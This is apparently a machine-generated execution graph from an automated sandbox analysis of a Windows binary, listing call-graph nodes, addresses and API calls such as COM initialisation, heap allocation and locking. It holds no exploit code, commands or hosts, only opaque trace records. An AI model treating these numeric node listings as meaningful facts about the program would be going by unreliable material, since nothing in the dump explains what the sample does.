                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC514D70A19209CFDB45DFBAE84069EBBF2FFC9310F14C129D004AB3A5EBB559068B55

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:15.4%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:3.5%
                                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                                          Total number of Limit Nodes:94
                                                                                                                                                                                                                                          execution_graph 45070 410b00 45073 417140 45070->45073 45072 410b0f 45074 417158 45073->45074 45076 4171ac std::ios_base::_Ios_base_dtor 45074->45076 45077 40dc20 43 API calls std::ios_base::clear 45074->45077 45076->45072 45077->45076 45078 434d40 45261 414fd0 45078->45261 45081 434dba 45083 434e4b 45081->45083 45386 4ef210 46 API calls 45081->45386 45082 414e70 std::ios_base::clear 46 API calls 45082->45081 45085 417140 std::ios_base::clear 43 API calls 45083->45085 45088 434e56 _Error_objects 45085->45088 45086 434e00 45387 4172e0 46 API calls _Yarn 45086->45387 45265 4187e0 45088->45265 45092 435070 std::ios_base::clear 45275 414e70 45092->45275 45094 43508b std::ios_base::clear 45094->45094 45095 417380 std::ios_base::clear 46 API calls 45094->45095 45096 4350f2 std::ios_base::clear 45095->45096 45097 414e70 std::ios_base::clear 46 API calls 45096->45097 45098 435117 std::ios_base::clear 45097->45098 45279 433be0 45098->45279 45101 417140 std::ios_base::clear 43 API calls 45102 43513d 45101->45102 45103 417140 std::ios_base::clear 43 API calls 45102->45103 45104 435148 45103->45104 45105 417140 std::ios_base::clear 43 API calls 45104->45105 45106 435153 45105->45106 45107 417140 std::ios_base::clear 43 API calls 45106->45107 45108 43515e 45107->45108 45110 4351ab 45108->45110 45388 53f1aa AcquireSRWLockExclusive 45108->45388 45122 43522b Concurrency::wait 45110->45122 45395 4f57c0 46 API calls 45110->45395 45112 43517e _Error_objects 45112->45110 45393 53f0da 46 API calls _Error_objects 45112->45393 45113 4353a5 45116 4364bd 45113->45116 45120 53f1aa 3 API calls 45113->45120 45125 4353fe 45113->45125 45115 43519e 45394 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 45115->45394 45119 417140 std::ios_base::clear 43 API calls 45116->45119 45117 417140 std::ios_base::clear 43 API calls 45117->45113 45121 4364c8 45119->45121 45132 4353d1 _Error_objects 45120->45132 45123 417140 std::ios_base::clear 43 API calls 45121->45123 45135 435352 45122->45135 45396 41a1e0 45122->45396 45124 4364d0 45123->45124 45128 417140 std::ios_base::clear 43 API calls 45124->45128 45129 43547e 45125->45129 45404 4f57c0 46 API calls 45125->45404 45133 4364d8 45128->45133 45405 4f47f0 59 API calls 45129->45405 45130 4354bf 45406 4ed810 46 API calls 45130->45406 45132->45125 45402 53f0da 46 API calls _Error_objects 45132->45402 45135->45113 45135->45117 45137 4354ec 45407 4ed7d0 46 API calls 45137->45407 45138 4353f1 45403 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 45138->45403 45141 4354fe 45408 4f35f0 43 API calls __Getctype 45141->45408 45143 435538 45260 436370 45143->45260 45409 436600 46 API calls std::bad_exception::bad_exception 45143->45409 45144 417140 std::ios_base::clear 43 API calls 45146 436380 45144->45146 45148 417140 std::ios_base::clear 43 API calls 45146->45148 45147 435576 45410 4f36a0 43 API calls __Getctype 45147->45410 45150 43638b 45148->45150 45152 417140 std::ios_base::clear 43 API calls 45150->45152 45151 435581 45411 4f4600 46 API calls 2 library calls 45151->45411 45153 436396 45152->45153 45154 417140 std::ios_base::clear 43 API calls 45153->45154 45156 4363a1 45154->45156 45157 414fd0 std::ios_base::clear 46 API calls 45156->45157 45161 4363b1 45157->45161 45158 435636 Concurrency::wait 45412 506eb0 46 API calls __Getctype 45158->45412 45160 436402 45163 436493 45160->45163 45445 4ef210 46 API calls 45160->45445 45161->45160 45162 414e70 std::ios_base::clear 46 API calls 45161->45162 45162->45160 45165 417140 std::ios_base::clear 43 API calls 45163->45165 45166 43649e 45165->45166 45447 4f1460 46 API calls 3 library calls 45166->45447 45167 436448 45446 4172e0 46 API calls _Yarn 45167->45446 45171 435695 Concurrency::wait Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error __vswprintf_s_l 45413 420e20 14 API calls 4 library calls 45171->45413 45172 4358bc 45173 417140 std::ios_base::clear 43 API calls 45172->45173 45174 4358ca 45173->45174 45419 4f36a0 43 API calls __Getctype 45174->45419 45177 4358d5 45420 4f4600 46 API calls 2 library calls 45177->45420 45178 4358ad 45180 54eeae __aligned_free 14 API calls 45178->45180 45179 435767 __aulldiv __vswprintf_s_l 45179->45172 45414 4210e0 14 API calls 4 library calls 45179->45414 45180->45172 45181 435831 45181->45178 45415 4172e0 46 API calls _Yarn 45181->45415 45184 4358a1 45416 54eeae 45184->45416 45186 43598e Concurrency::wait 45421 506eb0 46 API calls __Getctype 45186->45421 45189 4359ed Concurrency::wait Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error __vswprintf_s_l 45422 420e20 14 API calls 4 library calls 45189->45422 45190 435c14 45191 417140 std::ios_base::clear 43 API calls 45190->45191 45192 435c22 45191->45192 45425 4f36a0 43 API calls __Getctype 45192->45425 45195 435c2d 45426 4f4600 46 API calls 2 library calls 45195->45426 45196 435c05 45198 54eeae __aligned_free 14 API calls 45196->45198 45197 435abf __aulldiv __vswprintf_s_l 45197->45190 45423 4210e0 14 API calls 4 library calls 45197->45423 45198->45190 45199 435b89 45199->45196 45424 4172e0 46 API calls _Yarn 45199->45424 45202 435bf9 45203 54eeae __aligned_free 14 API calls 45202->45203 45203->45196 45204 435cea Concurrency::wait 45427 506eb0 46 API calls __Getctype 45204->45427 45206 435d49 Concurrency::wait Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error __vswprintf_s_l 45428 420e20 14 API calls 4 library calls 45206->45428 45208 435f61 45209 417140 std::ios_base::clear 43 API calls 45208->45209 45210 435f6f 45209->45210 45211 435e1b __aulldiv __vswprintf_s_l 45211->45208 45429 4210e0 14 API calls 4 library calls 45211->45429 45214 435ee5 45221 435f52 45214->45221 45430 4172e0 46 API calls _Yarn 45214->45430 45260->45144 45262 41501e 45261->45262 45262->45262 45263 41a1e0 std::ios_base::clear 46 API calls 45262->45263 45264 415049 45263->45264 45264->45081 45264->45082 45267 4187f5 std::ios_base::clear 45265->45267 45266 418834 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 45448 41b790 45266->45448 45267->45266 45452 40dc90 45 API calls std::ios_base::clear 45267->45452 45270 418866 45271 417380 45270->45271 45272 41741c 45271->45272 45274 4173a0 _Yarn 45271->45274 45492 41a980 46 API calls 3 library calls 45272->45492 45274->45092 45276 414e97 45275->45276 45277 417380 std::ios_base::clear 46 API calls 45276->45277 45278 414ecd 45277->45278 45278->45094 45284 433c18 __aulldiv Concurrency::wait __vswprintf_s_l 45279->45284 45280 434970 Concurrency::wait 45280->45280 45281 41a1e0 std::ios_base::clear 46 API calls 45280->45281 45282 4349d1 45281->45282 45283 417140 std::ios_base::clear 43 API calls 45282->45283 45385 434813 45283->45385 45284->45280 45285 41a1e0 std::ios_base::clear 46 API calls 45284->45285 45286 433f15 45285->45286 45493 410820 45286->45493 45291 4150c0 std::bad_exception::bad_exception 46 API calls 45292 433f3d 45291->45292 45511 410ec0 45292->45511 45385->45101 45386->45086 45387->45083 45389 53f1be 45388->45389 45390 53f1c3 ReleaseSRWLockExclusive 45389->45390 46318 53f1f9 SleepConditionVariableSRW 45389->46318 45390->45112 45393->45115 45394->45110 45395->45122 45397 41a1f7 std::ios_base::clear 45396->45397 45399 41a201 std::ios_base::clear 45397->45399 46319 40dc90 45 API calls std::ios_base::clear 45397->46319 45400 41a214 _Yarn 45399->45400 45401 41c380 std::ios_base::clear 46 API calls 45399->45401 45400->45135 45401->45400 45402->45138 45403->45125 45404->45129 45405->45130 45406->45137 45407->45141 45408->45143 45409->45147 45410->45151 45411->45158 45412->45171 45413->45179 45414->45181 45415->45184 46320 55b421 45416->46320 45419->45177 45420->45186 45421->45189 45422->45197 45423->45199 45424->45202 45425->45195 45426->45204 45427->45206 45428->45211 45429->45214 45445->45167 45446->45163 45447->45116 45449 41b88b _Yarn 45448->45449 45450 41b80a std::ios_base::clear 45448->45450 45449->45270 45453 41c380 45450->45453 45452->45266 45454 41c3b9 45453->45454 45455 41c3a8 45453->45455 45457 41c3b1 45454->45457 45467 53ee6e 45454->45467 45459 41d950 45455->45459 45457->45449 45460 41d967 45459->45460 45461 41d96c 45459->45461 45478 40db60 RaiseException Concurrency::cancel_current_task 45460->45478 45463 53ee6e std::_Facet_Register 17 API calls 45461->45463 45464 41d975 45463->45464 45466 41d990 45464->45466 45479 553e9c 43 API calls 2 library calls 45464->45479 45466->45457 45469 53ee73 45467->45469 45470 53ee8d 45469->45470 45473 53ee8f std::_Facet_Register 45469->45473 45480 54eec9 45469->45480 45487 5558bf EnterCriticalSection LeaveCriticalSection std::_Facet_Register 45469->45487 45470->45457 45472 53f475 Concurrency::cancel_current_task 45489 5419d1 RaiseException 45472->45489 45473->45472 45488 5419d1 RaiseException 45473->45488 45475 53f492 IsProcessorFeaturePresent 45477 53f4b7 45475->45477 45477->45457 45478->45461 45485 55b45b __dosmaperr 45480->45485 45481 55b499 45491 54ef71 14 API calls __dosmaperr 45481->45491 45483 55b484 RtlAllocateHeap 45484 55b497 45483->45484 45483->45485 45484->45469 45485->45481 45485->45483 45490 5558bf EnterCriticalSection LeaveCriticalSection std::_Facet_Register 45485->45490 45487->45469 45488->45472 45489->45475 45490->45485 45491->45484 45492->45274 45494 410863 Concurrency::wait 45493->45494 45495 41a1e0 std::ios_base::clear 46 API calls 45494->45495 45496 41089f Concurrency::wait 45495->45496 45496->45496 45497 41a1e0 std::ios_base::clear 46 API calls 45496->45497 45498 410902 45497->45498 45614 414490 45498->45614 45500 410939 45619 414b50 45500->45619 45504 417140 std::ios_base::clear 43 API calls 45506 410aee 45504->45506 45505 4109cb 45505->45504 45507 4150c0 45506->45507 45508 415129 45507->45508 45672 41a340 45508->45672 45510 41515f 45510->45291 45512 410edd Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 45511->45512 45679 4149c0 45512->45679 45514 410ef0 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 45515 4149c0 48 API calls 45514->45515 45516 410f17 45515->45516 45689 414a90 45516->45689 45519 414a90 48 API calls 45520 410f33 45519->45520 45699 410b20 45520->45699 45631 418030 45614->45631 45652 418100 45619->45652 45622 4109bc 45627 414ee0 45622->45627 45623 414b91 45662 520670 47 API calls _Error_objects 45623->45662 45624 414ba2 45663 5206c0 45624->45663 45628 414ef6 45627->45628 45630 414ef1 45627->45630 45671 4172e0 46 API calls _Yarn 45628->45671 45630->45505 45638 41ac30 45631->45638 45634 416f40 45637 416f71 45634->45637 45635 4144dc 45635->45500 45637->45635 45651 41c4c0 46 API calls 45637->45651 45641 41b110 45638->45641 45642 41b132 45641->45642 45643 41b12d 45641->45643 45645 41b153 45642->45645 45646 41b142 45642->45646 45650 40db60 RaiseException Concurrency::cancel_current_task 45643->45650 45648 53ee6e std::_Facet_Register 17 API calls 45645->45648 45649 4144cc 45645->45649 45647 41d950 std::ios_base::clear 46 API calls 45646->45647 45647->45649 45648->45649 45649->45634 45650->45642 45651->45637 45653 414b7b 45652->45653 45654 41810a 45652->45654 45653->45622 45653->45623 45653->45624 45655 414fd0 std::ios_base::clear 46 API calls 45654->45655 45656 418117 45655->45656 45668 40eeb0 46 API calls std::bad_exception::bad_exception 45656->45668 45658 418123 45669 5419d1 RaiseException 45658->45669 45660 418131 45661 417140 std::ios_base::clear 43 API calls 45660->45661 45661->45653 45662->45622 45664 5206c4 45663->45664 45665 54eec9 ___std_exception_copy 15 API calls 45664->45665 45666 5206e0 45664->45666 45670 520620 10 API calls 3 library calls 45664->45670 45665->45664 45666->45622 45668->45658 45669->45660 45670->45664 45671->45630 45673 41a357 std::ios_base::clear 45672->45673 45676 41a361 std::ios_base::clear 45673->45676 45678 40dc90 45 API calls std::ios_base::clear 45673->45678 45675 41a374 _Yarn 45675->45510 45676->45675 45677 41c380 std::ios_base::clear 46 API calls 45676->45677 45677->45675 45678->45676 45680 418100 46 API calls 45679->45680 45681 4149eb 45680->45681 45682 414a01 45681->45682 45683 414a12 45681->45683 45686 4149f4 45681->45686 45768 520670 47 API calls _Error_objects 45682->45768 45684 5206c0 _Error_objects 18 API calls 45683->45684 45684->45686 45687 414a54 _memcpy_s 45686->45687 45769 40d8e0 43 API calls 3 library calls 45686->45769 45687->45514 45690 418100 46 API calls 45689->45690 45691 414ac9 45690->45691 45692 414af0 45691->45692 45693 414adf 45691->45693 45696 414ad2 45691->45696 45695 5206c0 _Error_objects 18 API calls 45692->45695 45770 520670 47 API calls _Error_objects 45693->45770 45695->45696 45697 410f25 45696->45697 45771 40d8e0 43 API calls 3 library calls 45696->45771 45697->45519 45772 4116b0 45699->45772 45768->45686 45769->45687 45770->45696 45771->45697 45773 414b50 48 API calls 45772->45773 45774 4116db 45773->45774 45869 5377d0 45774->45869 45870 5377f6 _Error_objects 45869->45870 45871 53ee6e std::_Facet_Register 17 API calls 45870->45871 45872 53783f 45871->45872 46318->45389 46319->45399 46321 55b42c RtlFreeHeap 46320->46321 46322 54eec6 46320->46322 46321->46322 46323 55b441 GetLastError 46321->46323 46322->45178 46324 55b44e __dosmaperr 46323->46324 46326 54ef71 14 API calls __dosmaperr 46324->46326 46326->46322 46327 432d40 46328 432d5c 46327->46328 46340 432d93 46327->46340 46329 53f1aa 3 API calls 46328->46329 46334 432d66 _Error_objects 46329->46334 46331 432e20 46333 417140 std::ios_base::clear 43 API calls 46331->46333 46332 432df9 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46332->46331 46335 432e19 SetCurrentDirectoryA 46332->46335 46336 432e28 46333->46336 46334->46340 46341 53f0da 46 API calls _Error_objects 46334->46341 46335->46331 46338 432d86 46342 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 46338->46342 46340->46332 46343 4f57c0 46 API calls 46340->46343 46341->46338 46342->46340 46343->46332 46344 433600 CoInitializeEx 46345 433621 CoInitializeSecurity 46344->46345 46346 43361c 46344->46346 46347 433642 CoUninitialize 46345->46347 46348 43364d CoCreateInstance 46345->46348 46347->46346 46349 433675 46348->46349 46350 43367b CoUninitialize 46348->46350 46349->46350 46351 433686 46349->46351 46350->46346 46375 41f8a0 46351->46375 46353 4336a5 46354 4336f5 46353->46354 46385 41f930 SysFreeString std::ios_base::_Ios_base_dtor 46353->46385 46356 433708 CoUninitialize 46354->46356 46357 433713 46354->46357 46356->46346 46380 41f830 46357->46380 46359 433732 46360 41f830 27 API calls 46359->46360 46361 433763 46360->46361 46362 4337af 46361->46362 46386 41f930 SysFreeString std::ios_base::_Ios_base_dtor 46361->46386 46363 4337c4 46362->46363 46387 41f930 SysFreeString std::ios_base::_Ios_base_dtor 46362->46387 46366 4337d7 CoUninitialize 46363->46366 46372 4337e2 _memcpy_s 46363->46372 46366->46346 46367 4338d0 CoUninitialize 46367->46346 46368 43382a 46368->46367 46370 414fd0 std::ios_base::clear 46 API calls 46370->46372 46372->46367 46372->46368 46372->46370 46373 417140 std::ios_base::clear 43 API calls 46372->46373 46388 41f490 56 API calls 2 library calls 46372->46388 46389 4f5470 46372->46389 46374 4338b3 VariantClear 46373->46374 46374->46372 46376 53ee6e std::_Facet_Register 17 API calls 46375->46376 46377 41f8b0 46376->46377 46378 41f8bc SysAllocString 46377->46378 46379 41f8e7 _com_issue_error 46377->46379 46378->46379 46379->46353 46381 53ee6e std::_Facet_Register 17 API calls 46380->46381 46382 41f840 46381->46382 46384 41f869 _com_issue_error 46382->46384 46393 540f60 25 API calls 5 library calls 46382->46393 46384->46359 46385->46354 46386->46362 46387->46363 46388->46372 46390 4f54a3 46389->46390 46392 4f5495 46389->46392 46394 4fc000 46390->46394 46392->46372 46393->46384 46395 4fc080 46394->46395 46396 4fc0a9 46395->46396 46418 41db00 45 API calls std::ios_base::clear 46395->46418 46409 5013c0 46396->46409 46399 4fc0cd Concurrency::wait std::ios_base::clear 46400 4fc135 46399->46400 46401 4fc153 46399->46401 46419 5021d0 43 API calls std::ios_base::clear 46400->46419 46420 5021d0 43 API calls std::ios_base::clear 46401->46420 46404 4fc14e 46422 501230 43 API calls 2 library calls 46404->46422 46405 4fc16a 46421 5021d0 43 API calls std::ios_base::clear 46405->46421 46408 4fc1ee 46408->46392 46410 5013e2 46409->46410 46411 5013dd 46409->46411 46413 5013f2 46410->46413 46415 501403 46410->46415 46423 40db60 RaiseException Concurrency::cancel_current_task 46411->46423 46414 41d950 std::ios_base::clear 46 API calls 46413->46414 46416 5013fb 46414->46416 46415->46416 46417 53ee6e std::_Facet_Register 17 API calls 46415->46417 46416->46399 46417->46416 46418->46396 46419->46404 46420->46405 46421->46404 46422->46408 46423->46410 46424 4366c0 46425 4366e9 46424->46425 46427 436720 46424->46427 46426 53f1aa 3 API calls 46425->46426 46430 4366f3 _Error_objects 46426->46430 46429 43679d _Error_objects 46427->46429 46586 4f57c0 46 API calls 46427->46586 46432 53f1aa 3 API calls 46429->46432 46435 436804 46429->46435 46430->46427 46584 53f0da 46 API calls _Error_objects 46430->46584 46437 4367d7 _Error_objects 46432->46437 46433 436713 46585 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 46433->46585 46441 436881 46435->46441 46589 4f57c0 46 API calls 46435->46589 46437->46435 46587 53f0da 46 API calls _Error_objects 46437->46587 46439 4367f7 46588 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 46439->46588 46442 4187e0 46 API calls 46441->46442 46443 436a38 46442->46443 46444 417380 std::ios_base::clear 46 API calls 46443->46444 46445 436a90 std::ios_base::clear 46444->46445 46446 414e70 std::ios_base::clear 46 API calls 46445->46446 46447 436aab std::ios_base::clear 46446->46447 46447->46447 46448 417380 std::ios_base::clear 46 API calls 46447->46448 46449 436b12 std::ios_base::clear 46448->46449 46450 414e70 std::ios_base::clear 46 API calls 46449->46450 46451 436b37 std::ios_base::clear 46450->46451 46452 433be0 92 API calls 46451->46452 46453 436b4f 46452->46453 46454 417140 std::ios_base::clear 43 API calls 46453->46454 46455 436b5d 46454->46455 46456 417140 std::ios_base::clear 43 API calls 46455->46456 46457 436b68 46456->46457 46458 417140 std::ios_base::clear 43 API calls 46457->46458 46459 436b73 46458->46459 46460 417140 std::ios_base::clear 43 API calls 46459->46460 46461 436b7e 46460->46461 46462 414fd0 std::ios_base::clear 46 API calls 46461->46462 46463 436b8e 46462->46463 46464 436bdf 46463->46464 46465 414e70 std::ios_base::clear 46 API calls 46463->46465 46466 436c70 46464->46466 46590 4ef210 46 API calls 46464->46590 46465->46464 46467 417140 std::ios_base::clear 43 API calls 46466->46467 46480 436c7b Concurrency::wait 46467->46480 46469 436c25 46591 4172e0 46 API calls _Yarn 46469->46591 46471 436de9 46473 437942 46471->46473 46476 53f1aa 3 API calls 46471->46476 46479 436e43 46471->46479 46472 417140 std::ios_base::clear 43 API calls 46472->46471 46474 417140 std::ios_base::clear 43 API calls 46473->46474 46475 43794d 46474->46475 46477 417140 std::ios_base::clear 43 API calls 46475->46477 46486 436e16 _Error_objects 46476->46486 46478 437955 46477->46478 46481 417140 std::ios_base::clear 43 API calls 46478->46481 46488 436ec3 46479->46488 46594 4f57c0 46 API calls 46479->46594 46485 41a1e0 std::ios_base::clear 46 API calls 46480->46485 46489 436d96 46480->46489 46487 43795d 46481->46487 46484 436f04 46491 53f1aa 3 API calls 46484->46491 46494 436f55 46484->46494 46485->46489 46486->46479 46592 53f0da 46 API calls _Error_objects 46486->46592 46595 4f47f0 59 API calls 46488->46595 46489->46471 46489->46472 46499 436f28 _Error_objects 46491->46499 46492 436e36 46593 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 46492->46593 46497 436fd5 46494->46497 46598 4f57c0 46 API calls 46494->46598 46599 4ed810 46 API calls 46497->46599 46498 43700b 46600 4ed7d0 46 API calls 46498->46600 46499->46494 46596 53f0da 46 API calls _Error_objects 46499->46596 46502 43701d 46601 4f35f0 43 API calls __Getctype 46502->46601 46503 436f48 46597 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 46503->46597 46506 437057 46583 437818 46506->46583 46602 436600 46 API calls std::bad_exception::bad_exception 46506->46602 46507 417140 std::ios_base::clear 43 API calls 46510 437828 46507->46510 46509 437095 46603 4f36a0 43 API calls __Getctype 46509->46603 46512 417140 std::ios_base::clear 43 API calls 46510->46512 46514 437833 46512->46514 46513 4370a0 46604 4f4600 46 API calls 2 library calls 46513->46604 46515 417140 std::ios_base::clear 43 API calls 46514->46515 46516 43783e 46515->46516 46518 417140 std::ios_base::clear 43 API calls 46516->46518 46519 437849 46518->46519 46522 53f1aa 3 API calls 46519->46522 46525 437897 46519->46525 46520 437143 46605 4f48c0 46 API calls 46520->46605 46529 43786a _Error_objects 46522->46529 46523 43715b 46606 4f36a0 43 API calls __Getctype 46523->46606 46528 437917 46525->46528 46623 4f57c0 46 API calls 46525->46623 46624 4f1460 46 API calls 3 library calls 46528->46624 46529->46525 46621 53f0da 46 API calls _Error_objects 46529->46621 46531 437166 46607 4f4600 46 API calls 2 library calls 46531->46607 46532 43788a 46622 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 46532->46622 46535 437216 Concurrency::wait 46608 506eb0 46 API calls __Getctype 46535->46608 46538 437266 Concurrency::wait Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error __vswprintf_s_l 46609 420e20 14 API calls 4 library calls 46538->46609 46539 43746f 46540 417140 std::ios_base::clear 43 API calls 46539->46540 46541 43747d 46540->46541 46612 4f36a0 43 API calls __Getctype 46541->46612 46544 437460 46546 54eeae __aligned_free 14 API calls 46544->46546 46545 437338 __aulldiv __vswprintf_s_l 46545->46539 46610 4210e0 14 API calls 4 library calls 46545->46610 46546->46539 46547 437488 46613 4f4600 46 API calls 2 library calls 46547->46613 46548 437402 46548->46544 46611 4172e0 46 API calls _Yarn 46548->46611 46550 437457 46552 54eeae __aligned_free 14 API calls 46550->46552 46552->46544 46553 437538 Concurrency::wait 46614 506eb0 46 API calls __Getctype 46553->46614 46555 437588 Concurrency::wait Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error __vswprintf_s_l 46615 420e20 14 API calls 4 library calls 46555->46615 46557 437791 46558 417140 std::ios_base::clear 43 API calls 46557->46558 46559 43779f 46558->46559 46618 4fb680 46 API calls std::bad_exception::bad_exception 46559->46618 46562 4377c7 46619 4f4f10 46 API calls 46562->46619 46563 43765a __aulldiv __vswprintf_s_l 46563->46557 46616 4210e0 14 API calls 4 library calls 46563->46616 46565 54eeae __aligned_free 14 API calls 46565->46557 46566 4377d6 46620 437ae0 43 API calls std::ios_base::clear 46566->46620 46568 437724 46575 437782 46568->46575 46617 4172e0 46 API calls _Yarn 46568->46617 46569 4377e1 46571 417140 std::ios_base::clear 43 API calls 46569->46571 46573 4377ec 46571->46573 46572 437779 46574 54eeae __aligned_free 14 API calls 46572->46574 46576 417140 std::ios_base::clear 43 API calls 46573->46576 46574->46575 46575->46565 46577 4377f7 46576->46577 46578 417140 std::ios_base::clear 43 API calls 46577->46578 46579 437802 46578->46579 46580 417140 std::ios_base::clear 43 API calls 46579->46580 46581 43780d 46580->46581 46582 417140 std::ios_base::clear 43 API calls 46581->46582 46582->46583 46583->46507 46584->46433 46585->46427 46586->46429 46587->46439 46588->46435 46589->46441 46590->46469 46591->46466 46592->46492 46593->46479 46594->46488 46595->46484 46596->46503 46597->46494 46598->46497 46599->46498 46600->46502 46601->46506 46602->46509 46603->46513 46604->46520 46605->46523 46606->46531 46607->46535 46608->46538 46609->46545 46610->46548 46611->46550 46612->46547 46613->46553 46614->46555 46615->46563 46616->46568 46617->46572 46618->46562 46619->46566 46620->46569 46621->46532 46622->46525 46623->46528 46624->46473 46625 43e340 46642 43e349 Concurrency::wait std::ios_base::clear Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46625->46642 46626 43e897 46627 553323 43 API calls 46626->46627 46629 43e8bb 46627->46629 46631 4150c0 std::bad_exception::bad_exception 46 API calls 46629->46631 46630 53ee6e std::_Facet_Register 17 API calls 46630->46642 46632 43e8ea 46631->46632 46633 4f2110 43 API calls 46632->46633 46634 43e882 46633->46634 46635 4187e0 46 API calls 46635->46642 46636 4f5c80 46 API calls 46636->46642 46637 417380 std::ios_base::clear 46 API calls 46637->46642 46638 41a1e0 46 API calls std::ios_base::clear 46638->46642 46639 509bd0 70 API calls 46639->46642 46640 417140 43 API calls std::ios_base::clear 46640->46642 46642->46626 46642->46630 46642->46635 46642->46636 46642->46637 46642->46638 46642->46639 46642->46640 46643 43e851 46642->46643 46649 553323 46642->46649 46652 4ee570 43 API calls 2 library calls 46642->46652 46644 4150c0 std::bad_exception::bad_exception 46 API calls 46643->46644 46645 43e86f 46644->46645 46646 417140 std::ios_base::clear 43 API calls 46645->46646 46647 43e87a 46646->46647 46653 4f2110 46647->46653 46659 55af41 GetLastError 46649->46659 46652->46642 46655 4f21cd std::ios_base::_Ios_base_dtor 46653->46655 46658 4f2149 std::ios_base::_Ios_base_dtor 46653->46658 46654 4f218b 46654->46655 46696 40dc20 43 API calls std::ios_base::clear 46654->46696 46655->46634 46656 417140 std::ios_base::clear 43 API calls 46656->46658 46658->46654 46658->46656 46660 55af57 46659->46660 46661 55af5d 46659->46661 46688 55b9c6 6 API calls std::_Locinfo::_Locinfo_dtor 46660->46688 46666 55af61 46661->46666 46689 55ba05 6 API calls std::_Locinfo::_Locinfo_dtor 46661->46689 46664 55af79 46665 55af81 46664->46665 46664->46666 46690 55d0d9 14 API calls 2 library calls 46665->46690 46667 55afe6 SetLastError 46666->46667 46670 55aff6 46667->46670 46671 553328 46667->46671 46669 55af8e 46672 55afa7 46669->46672 46673 55af96 46669->46673 46695 554404 43 API calls std::locale::_Setgloballocale 46670->46695 46671->46642 46692 55ba05 6 API calls std::_Locinfo::_Locinfo_dtor 46672->46692 46691 55ba05 6 API calls std::_Locinfo::_Locinfo_dtor 46673->46691 46678 55afa4 46682 55b421 __aligned_free 14 API calls 46678->46682 46679 55afb3 46680 55afb7 46679->46680 46681 55afce 46679->46681 46693 55ba05 6 API calls std::_Locinfo::_Locinfo_dtor 46680->46693 46694 55ad6f 14 API calls __dosmaperr 46681->46694 46685 55afcb 46682->46685 46685->46667 46686 55afd9 46687 55b421 __aligned_free 14 API calls 46686->46687 46687->46685 46688->46661 46689->46664 46690->46669 46691->46678 46692->46679 46693->46678 46694->46686 46696->46655 46697 434b20 46698 434b36 46697->46698 46699 53ee6e std::_Facet_Register 17 API calls 46698->46699 46700 434b40 __aulldiv Concurrency::wait __vswprintf_s_l 46699->46700 46700->46700 46701 4f5c80 46 API calls 46700->46701 46702 434ce5 46701->46702 46703 414fd0 std::ios_base::clear 46 API calls 46702->46703 46704 434cf4 46703->46704 46705 4150c0 std::bad_exception::bad_exception 46 API calls 46704->46705 46706 434d09 46705->46706 46707 509bd0 70 API calls 46706->46707 46708 434d19 46707->46708 46709 417140 std::ios_base::clear 43 API calls 46708->46709 46710 434d24 46709->46710 46711 417140 std::ios_base::clear 43 API calls 46710->46711 46712 434d2c 46711->46712 46713 451720 46714 45173d __aulldiv _memcpy_s Concurrency::wait __vswprintf_s_l 46713->46714 46714->46714 46715 41a1e0 std::ios_base::clear 46 API calls 46714->46715 46719 4518e4 Concurrency::wait 46715->46719 46716 451aff 47093 4186f0 46716->47093 46718 451bc9 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 47099 42c670 46718->47099 46719->46716 46720 41a1e0 std::ios_base::clear 46 API calls 46719->46720 46722 451ae2 46720->46722 46724 414e70 std::ios_base::clear 46 API calls 46722->46724 46723 451bd9 46725 417140 std::ios_base::clear 43 API calls 46723->46725 46726 451af4 46724->46726 46727 451be7 46725->46727 46728 417140 std::ios_base::clear 43 API calls 46726->46728 46729 451bef 46727->46729 46732 451c0f 46727->46732 46728->46716 46730 417140 std::ios_base::clear 43 API calls 46729->46730 46731 451c04 46730->46731 46733 4186f0 46 API calls 46732->46733 46734 451cd9 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46733->46734 46735 42c670 2 API calls 46734->46735 46736 451ce9 46735->46736 46737 417140 std::ios_base::clear 43 API calls 46736->46737 46738 451cf7 46737->46738 46739 451cff 46738->46739 46741 451d1f 46738->46741 46740 417140 std::ios_base::clear 43 API calls 46739->46740 46740->46731 46742 4186f0 46 API calls 46741->46742 46743 451de9 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46742->46743 46744 42c670 2 API calls 46743->46744 46745 451df9 46744->46745 46746 417140 std::ios_base::clear 43 API calls 46745->46746 46747 451e07 46746->46747 46748 451e0f 46747->46748 46750 451e2f 46747->46750 46749 417140 std::ios_base::clear 43 API calls 46748->46749 46749->46731 46751 4186f0 46 API calls 46750->46751 46752 451ef9 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46751->46752 46753 42c670 2 API calls 46752->46753 46754 451f09 46753->46754 46755 417140 std::ios_base::clear 43 API calls 46754->46755 46756 451f17 46755->46756 46757 451f1f 46756->46757 46759 451f3f 46756->46759 46758 417140 std::ios_base::clear 43 API calls 46757->46758 46758->46731 46760 4186f0 46 API calls 46759->46760 46761 452009 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46760->46761 46762 42c670 2 API calls 46761->46762 46763 452019 46762->46763 46764 417140 